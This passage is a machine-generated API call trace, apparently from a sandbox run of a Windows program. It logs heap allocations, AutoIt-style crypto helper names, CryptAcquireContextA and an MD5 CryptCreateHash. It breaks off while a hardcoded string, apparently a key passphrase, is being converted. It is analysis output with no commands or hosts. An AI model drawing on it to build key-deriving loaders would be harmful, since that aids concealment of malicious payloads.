[0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0094.755] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0094.755] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0094.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0094.756] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0094.756] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0094.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0094.758] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.758] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.759] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0094.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797088, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0094.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15) returned 0x1796d88 [0094.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.760] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0094.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.761] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0094.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0094.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0094.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0094.761] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.762] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0094.763] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0094.763] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2630 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca790 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0094.763] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0094.763] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0094.764] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca808 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0094.764] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0094.764] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0094.764] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0094.765] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0094.765] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0094.765] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0094.766] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0094.766] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0094.766] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0094.766] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0094.766] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0094.766] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0094.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0094.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cad18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0094.766] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0094.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", 